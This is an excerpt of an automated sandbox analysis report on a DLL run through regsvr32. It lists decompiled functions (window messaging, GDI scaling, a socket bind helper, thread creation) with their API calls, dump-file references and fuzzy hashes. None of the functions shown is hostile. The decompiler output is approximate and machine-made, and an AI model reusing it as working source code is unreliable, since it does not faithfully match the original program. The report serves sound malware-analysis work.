                                                                                                                0x1002198e
                                                                                                                0x10021999
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002199f
                                                                                                                0x1002199f

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1001D1E6: GetDlgItem.USER32(?,?), ref: 1001D1F3
                                                                                                                • SendMessageA.USER32 ref: 1002193A
                                                                                                                • SendMessageA.USER32 ref: 1002194E
                                                                                                                • SendMessageA.USER32 ref: 10021974
                                                                                                                • GetWindow.USER32(?,00000002), ref: 1002197E
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 1002198E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$ItemLong
                                                                                                                • String ID:
                                                                                                                • API String ID: 1613074769-0
                                                                                                                • Opcode ID: e2e1e157a924f14629dcaf8b4a3f295fe93a3e35b81a09e34dcd476e42d8d07e
                                                                                                                • Instruction ID: 46d78e2b7352745125e3709bf3bebae527a4c2ce565a9a805d4617d2ddf5d6ac
                                                                                                                • Opcode Fuzzy Hash: e2e1e157a924f14629dcaf8b4a3f295fe93a3e35b81a09e34dcd476e42d8d07e
                                                                                                                • Instruction Fuzzy Hash: FD114F7964021AFFEF019F50DC90EAA7B69EF143A4F508125FD199B2A0CB31DD91DB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100271DD Relevance: 7.6, APIs: 5, Instructions: 59windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100271DD(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t24;
				unsigned int _t34;
				void* _t46;

				_t46 = __ecx;
				if(IsWindow( *(__ecx + 0x20)) == 0) {
					 *(_t46 + 0xac) = _a4;
					 *(_t46 + 0xb0) = _a8;
					 *(_t46 + 0xa4) = _a12;
					_t24 = _a16;
					 *(_t46 + 0xa8) = _t24;
					return _t24;
				}
				SendMessageA( *(_t46 + 0x20), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t46 + 0x20), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				if( *0x1006d320 >= 0x60000) {
					_t34 = SendMessageA( *(_t46 + 0x20), 0x43a, 0, 0);
					 *(_t46 + 0xac) = _t34 & 0x0000ffff;
					 *(_t46 + 0xb0) = _t34 >> 0x10;
				}
				return InvalidateRect( *(_t46 + 0x20), 0, 1);
			}






                                                                                                                0x100271e1
                                                                                                                0x100271ee
                                                                                                                0x10027269
                                                                                                                0x10027272
                                                                                                                0x1002727b
                                                                                                                0x10027281
                                                                                                                0x10027284
                                                                                                                0x00000000
                                                                                                                0x10027284
                                                                                                                0x10027211
                                                                                                                0x1002722a
                                                                                                                0x10027236
                                                                                                                0x10027242
                                                                                                                0x1002724a
                                                                                                                0x10027250
                                                                                                                0x10027250
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$InvalidateRectWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3225880595-0
                                                                                                                • Opcode ID: 36d343ef5c7402005a4e3315341ea43abf90203410fab0118e03014d4d576c3f
                                                                                                                • Instruction ID: 0ee4da7db3da10282c4979f1e740b66ff5433e5b017fe0c6a0933576c7f17b31
                                                                                                                • Opcode Fuzzy Hash: 36d343ef5c7402005a4e3315341ea43abf90203410fab0118e03014d4d576c3f
                                                                                                                • Instruction Fuzzy Hash: A0111CB1600718AFF7508F29DC80AB7B7E9FB48755F40452EF999C6160E7B0AC50DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10011780 Relevance: 7.6, APIs: 5, Instructions: 58windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E10011780(void* __ecx) {
				long _v4;
				long _v8;
				long _v12;
				char _v16;
				void* _t12;
				void* _t33;

				_t33 = __ecx;
				E10021B44(_t12);
				_push(0x65);
				_t31 = __ecx + 0x70;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_v4 = 0;
				E1002631A(__ecx + 0x70, 0,  &_v16, __ecx);
				E1001D35E(_t31, 5);
				SendMessageA( *(_t33 + 0x90), 0x1036, 0, 0x100);
				SendMessageA( *(_t33 + 0x90), 0x1001, 0, 0xc0c0c0);
				SendMessageA( *(_t33 + 0x90), 0x1026, 0, 0xc0c0c0);
				SendMessageA( *(_t33 + 0x90), 0x1024, 0, 0xff0000);
				return SendMessageA( *(_t33 + 0x90), 0x1016, 1, 0);
			}









                                                                                                                0x10011786
                                                                                                                0x10011788
                                                                                                                0x1001178d
                                                                                                                0x10011797
                                                                                                                0x1001179d
                                                                                                                0x100117a1
                                                                                                                0x100117a5
                                                                                                                0x100117a9
                                                                                                                0x100117ad
                                                                                                                0x100117b6
                                                                                                                0x100117d3
                                                                                                                0x100117e7
                                                                                                                0x100117fb
                                                                                                                0x1001180f
                                                                                                                0x10011828

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ShowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 187340077-0
                                                                                                                • Opcode ID: 731a49680897c6da82a5d9ad7e48ab59cec6926edf0410b79d4e2cdcb0502602
                                                                                                                • Instruction ID: 7612613c93e32a0060621654432e9fcdfd63722aa98c803f60e1976e18034937
                                                                                                                • Opcode Fuzzy Hash: 731a49680897c6da82a5d9ad7e48ab59cec6926edf0410b79d4e2cdcb0502602
                                                                                                                • Instruction Fuzzy Hash: 50015EB66407047AE320AF758CC1FABE29DEFC8B48F44091DF299A71D1C9F5A9408A65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10024B45 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10024B45(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x10070c88; // 0x60
					_t12 =  *0x10070c8c; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E1002439D(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                                                                0x10024b48
                                                                                                                0x10024b4b
                                                                                                                0x10024b50
                                                                                                                0x10024b9c
                                                                                                                0x10024ba2
                                                                                                                0x00000000
                                                                                                                0x10024b52
                                                                                                                0x10024b5b
                                                                                                                0x10024b60
                                                                                                                0x10024b96
                                                                                                                0x10024b98
                                                                                                                0x10024ba7
                                                                                                                0x10024ba7
                                                                                                                0x10024bb9
                                                                                                                0x10024bc1
                                                                                                                0x10024bc7
                                                                                                                0x10024bc9
                                                                                                                0x10024b67
                                                                                                                0x10024b69
                                                                                                                0x10024b6d
                                                                                                                0x10024b75
                                                                                                                0x10024b7c
                                                                                                                0x10024b7f
                                                                                                                0x10024b7f
                                                                                                                0x10024b60
                                                                                                                0x10024bd0

                                                                                                                APIs
                                                                                                                • GetMapMode.GDI32(?), ref: 10024B55
                                                                                                                • GetDeviceCaps.GDI32(?,00000058), ref: 10024B8F
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 10024B98
                                                                                                                  • Part of subcall function 1002439D: MulDiv.KERNEL32 ref: 100243DD
                                                                                                                  • Part of subcall function 1002439D: MulDiv.KERNEL32 ref: 100243FA
                                                                                                                • MulDiv.KERNEL32 ref: 10024BBC
                                                                                                                • MulDiv.KERNEL32 ref: 10024BC7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Mode
                                                                                                                • String ID:
                                                                                                                • API String ID: 696222070-0
                                                                                                                • Opcode ID: d0451dc5bda9c491a689ca8ae5625cbd2c431c57943d05e4d6bf0c902c0d6533
                                                                                                                • Instruction ID: 58b8763670d61b3926136e7877b908b05b26f116823db2f1d59ca0f11a90bc59
                                                                                                                • Opcode Fuzzy Hash: d0451dc5bda9c491a689ca8ae5625cbd2c431c57943d05e4d6bf0c902c0d6533
                                                                                                                • Instruction Fuzzy Hash: C711CE35600A14EFDB22EF59DC84D1EBBB9EF88760B124419F98297360DB71ED408F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10024BD3 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10024BD3(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x10070c88; // 0x60
					_t12 =  *0x10070c8c; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10024334(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                                                                0x10024bd6
                                                                                                                0x10024bd9
                                                                                                                0x10024bde
                                                                                                                0x10024c2a
                                                                                                                0x10024c30
                                                                                                                0x00000000
                                                                                                                0x10024be0
                                                                                                                0x10024be9
                                                                                                                0x10024bee
                                                                                                                0x10024c24
                                                                                                                0x10024c26
                                                                                                                0x10024c35
                                                                                                                0x10024c35
                                                                                                                0x10024c47
                                                                                                                0x10024c50
                                                                                                                0x10024c55
                                                                                                                0x10024c57
                                                                                                                0x10024bf5
                                                                                                                0x10024bf7
                                                                                                                0x10024bfb
                                                                                                                0x10024c03
                                                                                                                0x10024c0a
                                                                                                                0x10024c0d
                                                                                                                0x10024c0d
                                                                                                                0x10024bee
                                                                                                                0x10024c5e

                                                                                                                APIs
                                                                                                                • GetMapMode.GDI32(?), ref: 10024BE3
                                                                                                                • GetDeviceCaps.GDI32(?,00000058), ref: 10024C1D
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 10024C26
                                                                                                                  • Part of subcall function 10024334: MulDiv.KERNEL32 ref: 10024374
                                                                                                                  • Part of subcall function 10024334: MulDiv.KERNEL32 ref: 10024391
                                                                                                                • MulDiv.KERNEL32 ref: 10024C4A
                                                                                                                • MulDiv.KERNEL32 ref: 10024C55
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Mode
                                                                                                                • String ID:
                                                                                                                • API String ID: 696222070-0
                                                                                                                • Opcode ID: 72c16e21384b73a1fc5a221c524e2a4d17e22dd4fdfbe1e1552dc394a9db06cb
                                                                                                                • Instruction ID: d17de11a873df856b6c2edb0a65fa4880e582bd89fdcc6cc969921f93305dea3
                                                                                                                • Opcode Fuzzy Hash: 72c16e21384b73a1fc5a221c524e2a4d17e22dd4fdfbe1e1552dc394a9db06cb
                                                                                                                • Instruction Fuzzy Hash: 6111CE35601614AFEB21DF19DC84C1EBBB9EF88760B628419F98667360CB71ED419F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002D750 Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E1002D750(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				int _t27;
				CHAR* _t28;
				signed int _t29;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x1006dbdc; // 0xdf7c0cda
				_v8 = _t9 ^ _t29;
				_t21 = _a4;
				_t32 = _t21;
				_t28 = _a8;
				if(_t21 == 0) {
					L1:
					E1001729E(_t21, _t22, _t26, _t28, _t32);
				}
				if(_t28 == 0) {
					goto L1;
				}
				_t27 = lstrlenA(_t28);
				_v264 = 0;
				E1003BB70(_t27,  &_v263, 0, 0xff);
				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
					_t16 = SetWindowTextA(_t21, _t28);
				}
				return E1003B437(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
			}


















                                                                                                                0x1002d750
                                                                                                                0x1002d750
                                                                                                                0x1002d759
                                                                                                                0x1002d760
                                                                                                                0x1002d764
                                                                                                                0x1002d767
                                                                                                                0x1002d76a
                                                                                                                0x1002d76e
                                                                                                                0x1002d770
                                                                                                                0x1002d770
                                                                                                                0x1002d770
                                                                                                                0x1002d777
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002d785
                                                                                                                0x1002d790
                                                                                                                0x1002d797
                                                                                                                0x1002d7a6
                                                                                                                0x1002d7cf
                                                                                                                0x1002d7cf
                                                                                                                0x1002d7e3

                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(?), ref: 1002D77A
                                                                                                                • _memset.LIBCMT ref: 1002D797
                                                                                                                • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002D7B1
                                                                                                                • lstrcmpA.KERNEL32(00000000,?), ref: 1002D7C3
                                                                                                                • SetWindowTextA.USER32(?,?), ref: 1002D7CF
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4273134663-0
                                                                                                                • Opcode ID: 9c8a90e2d40c88a5552160a9a431cfc347e7c3fe073d578c9596771d5ac53162
                                                                                                                • Instruction ID: 840ce94e709d45d1c2a1a099e559a60107cf57bb5c7396451a43401c7f154f48
                                                                                                                • Opcode Fuzzy Hash: 9c8a90e2d40c88a5552160a9a431cfc347e7c3fe073d578c9596771d5ac53162
                                                                                                                • Instruction Fuzzy Hash: F801F9B6600228AFE701EB64DCC5FDE73ACEF08750F400066F645D7141EA74DD848B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100284C4 Relevance: 7.6, APIs: 5, Instructions: 53networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E100284C4(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				short _v20;
				short _v22;
				char _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				short _t16;
				intOrPtr _t22;
				intOrPtr _t28;
				intOrPtr _t30;
				signed int _t31;

				_t28 = __edx;
				_t12 =  *0x1006dbdc; // 0xdf7c0cda
				_v8 = _t12 ^ _t31;
				_t30 = _a8;
				_t22 = __ecx;
				 *0x1006efc8();
				_t29 = 0;
				_v28 = 0;
				_t16 = E1003BB70(0,  &_v24, 0, 0x10);
				_v24 = 2;
				if(_t30 != 0) {
					__imp__#11(_t30);
					if(_t16 != 0xffffffff) {
						goto L2;
					} else {
						__imp__#112(0x2726);
					}
				} else {
					__imp__#8(0);
					L2:
					_v20 = _t16;
					__imp__#9(_a4);
					_v22 = _t16;
					_t29 = E1002847B( &_v24, _t22,  &_v24, 0x10);
				}
				E10015160( &_v28);
				return E1003B437(_t29, _t22, _v8 ^ _t31, _t28, _t29, _t30);
			}

















                                                                                                                0x100284c4
                                                                                                                0x100284ca
                                                                                                                0x100284d1
                                                                                                                0x100284d6
                                                                                                                0x100284da
                                                                                                                0x100284dc
                                                                                                                0x100284e2
                                                                                                                0x100284eb
                                                                                                                0x100284ee
                                                                                                                0x100284f8
                                                                                                                0x100284fe
                                                                                                                0x10028529
                                                                                                                0x10028532
                                                                                                                0x00000000
                                                                                                                0x10028534
                                                                                                                0x10028539
                                                                                                                0x10028539
                                                                                                                0x10028500
                                                                                                                0x10028501
                                                                                                                0x10028507
                                                                                                                0x1002850a
                                                                                                                0x1002850d
                                                                                                                0x10028513
                                                                                                                0x10028524
                                                                                                                0x10028524
                                                                                                                0x10028542
                                                                                                                0x10028557

                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 100284EE
                                                                                                                • htonl.WS2_32(00000000), ref: 10028501
                                                                                                                • htons.WS2_32(?), ref: 1002850D
                                                                                                                  • Part of subcall function 1002847B: bind.WS2_32(?,00000002,00000002), ref: 10028486
                                                                                                                • inet_addr.WS2_32(?), ref: 10028529
                                                                                                                • WSASetLastError.WS2_32(00002726), ref: 10028539
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast_memsetbindhtonlhtonsinet_addr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3310600910-0
                                                                                                                • Opcode ID: 275b6a40a52886df755adf28c9cdad384373f065aee1e7e136bf502101c8e61d
                                                                                                                • Instruction ID: 5191e71d5d14f494881b45bb81c93006ac3d9af170c3ab7f85a69c119cc3e4c7
                                                                                                                • Opcode Fuzzy Hash: 275b6a40a52886df755adf28c9cdad384373f065aee1e7e136bf502101c8e61d
                                                                                                                • Instruction Fuzzy Hash: B811C835A0021DABDB00EFA4EC858AFB7B9EF88311F500419F501E7291DB749F449761
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10040A4C Relevance: 7.5, APIs: 5, Instructions: 43threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 27%
                                                                                                                			E10040A4C(void* __ebx, intOrPtr __edx, void* __edi, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
				intOrPtr* _v0;
				DWORD* _v8;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				void* __esi;
				void* _t30;
				void* _t36;
				DWORD* _t41;
				intOrPtr* _t43;
				void* _t45;
				void* _t51;
				intOrPtr* _t54;
				void* _t64;
				intOrPtr _t65;
				intOrPtr* _t67;
				void* _t68;

				_t64 = __edi;
				_t61 = __edx;
				_t51 = __ebx;
				E10040E0D(_v28);
				asm("int3");
				_push(_t67);
				E1004296C();
				_t30 = E10042951(E10042966());
				if(_t30 != 0) {
					_t54 = _v0;
					 *((intOrPtr*)(_t30 + 0x54)) =  *((intOrPtr*)(_t54 + 0x54));
					 *((intOrPtr*)(_t30 + 0x58)) =  *((intOrPtr*)(_t54 + 0x58));
					_t61 =  *((intOrPtr*)(_t54 + 4));
					_push(_t54);
					 *((intOrPtr*)(_t30 + 4)) =  *((intOrPtr*)(_t54 + 4));
					E10042B3B(__ebx, __edi, _t67, __eflags);
				} else {
					_t67 = _v0;
					if(E10042996(E10042966(), _t67) == 0) {
						ExitThread(GetLastError());
					}
					 *_t67 = GetCurrentThreadId();
				}
				_t78 =  *0x1005dfe4;
				if( *0x1005dfe4 != 0) {
					_t45 = E10047552(_t51, _t64, _t67, _t78);
					_t79 = _t45;
					_t54 = 0x1005dfe4;
					if(_t45 != 0) {
						 *0x1005dfe4();
					}
				}
				E10040A17(_t61, _t64, _t67, _t79);
				asm("int3");
				_push(_t54);
				_push(_t51);
				_push(_t64);
				_t65 = _v0;
				_t80 = _t65;
				_v20 = 0;
				if(_t65 != 0) {
					_push(_t67);
					E1004296C();
					_t68 = E10046749(1, 0x214);
					__eflags = _t68;
					if(__eflags == 0) {
						L16:
						_push(_t68);
						E1003B59D(0, _t65, _t68, __eflags);
						__eflags = _v8;
						if(_v8 != 0) {
							E1003D4A4(_v8);
						}
						_t36 = 0;
						__eflags = 0;
					} else {
						_push( *((intOrPtr*)(E10042B23(_t61, _t65, __eflags) + 0x6c)));
						_push(_t68);
						E100429EC(0, _t65, _t68, __eflags);
						 *(_t68 + 4) =  *(_t68 + 4) | 0xffffffff;
						 *((intOrPtr*)(_t68 + 0x58)) = _a16;
						_t41 = _a24;
						__eflags = _t41;
						 *((intOrPtr*)(_t68 + 0x54)) = _t65;
						if(_t41 == 0) {
							_t41 =  &_a12;
						}
						_t36 = CreateThread(_a4, _a8, 0x10040a58, _t68, _a20, _t41);
						__eflags = _t36;
						if(__eflags == 0) {
							_v8 = GetLastError();
							goto L16;
						}
					}
				} else {
					_t43 = E1003D47E(_t80);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t43 = 0x16;
					E10041BCB(0, _t61, _t65);
					_t36 = 0;
				}
				return _t36;
			}




















                                                                                                                0x10040a4c
                                                                                                                0x10040a4c
                                                                                                                0x10040a4c
                                                                                                                0x10040a52
                                                                                                                0x10040a57
                                                                                                                0x10040a58
                                                                                                                0x10040a59
                                                                                                                0x10040a64
                                                                                                                0x10040a6b
                                                                                                                0x10040a98
                                                                                                                0x10040a9f
                                                                                                                0x10040aa5
                                                                                                                0x10040aa8
                                                                                                                0x10040aab
                                                                                                                0x10040aac
                                                                                                                0x10040aaf
                                                                                                                0x10040a6d
                                                                                                                0x10040a6d
                                                                                                                0x10040a7f
                                                                                                                0x10040a88
                                                                                                                0x10040a88
                                                                                                                0x10040a94
                                                                                                                0x10040a94
                                                                                                                0x10040ab4
                                                                                                                0x10040abb
                                                                                                                0x10040ac2
                                                                                                                0x10040ac7
                                                                                                                0x10040ac9
                                                                                                                0x10040aca
                                                                                                                0x10040acc
                                                                                                                0x10040acc
                                                                                                                0x10040aca
                                                                                                                0x10040ad2
                                                                                                                0x10040ad7
                                                                                                                0x10040adb
                                                                                                                0x10040adc
                                                                                                                0x10040add
                                                                                                                0x10040ade
                                                                                                                0x10040ae3
                                                                                                                0x10040ae5
                                                                                                                0x10040ae8
                                                                                                                0x10040b06
                                                                                                                0x10040b07
                                                                                                                0x10040b18
                                                                                                                0x10040b1a
                                                                                                                0x10040b1e
                                                                                                                0x10040b6a
                                                                                                                0x10040b6a
                                                                                                                0x10040b6b
                                                                                                                0x10040b70
                                                                                                                0x10040b74
                                                                                                                0x10040b79
                                                                                                                0x10040b7e
                                                                                                                0x10040b7f
                                                                                                                0x10040b7f
                                                                                                                0x10040b20
                                                                                                                0x10040b25
                                                                                                                0x10040b28
                                                                                                                0x10040b29
                                                                                                                0x10040b31
                                                                                                                0x10040b35
                                                                                                                0x10040b38
                                                                                                                0x10040b3b
                                                                                                                0x10040b3f
                                                                                                                0x10040b42
                                                                                                                0x10040b44
                                                                                                                0x10040b44
                                                                                                                0x10040b57
                                                                                                                0x10040b5d
                                                                                                                0x10040b5f
                                                                                                                0x10040b67
                                                                                                                0x00000000
                                                                                                                0x10040b67
                                                                                                                0x10040b5f
                                                                                                                0x10040aea
                                                                                                                0x10040aea
                                                                                                                0x10040aef
                                                                                                                0x10040af0
                                                                                                                0x10040af1
                                                                                                                0x10040af2
                                                                                                                0x10040af3
                                                                                                                0x10040af4
                                                                                                                0x10040afa
                                                                                                                0x10040b02
                                                                                                                0x10040b02
                                                                                                                0x10040b85

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10040E0D: _doexit.LIBCMT ref: 10040E15
                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 10040A59
                                                                                                                  • Part of subcall function 1004296C: TlsGetValue.KERNEL32 ref: 10042972
                                                                                                                  • Part of subcall function 1004296C: __decode_pointer.LIBCMT ref: 10042982
                                                                                                                  • Part of subcall function 1004296C: TlsSetValue.KERNEL32(00000000,10046716,?,00000001,00000001,10043228,00000018,10069028,0000000C,100432B7,00000001,00000001,?,10042BBE,0000000D,10068FA0), ref: 1004298F
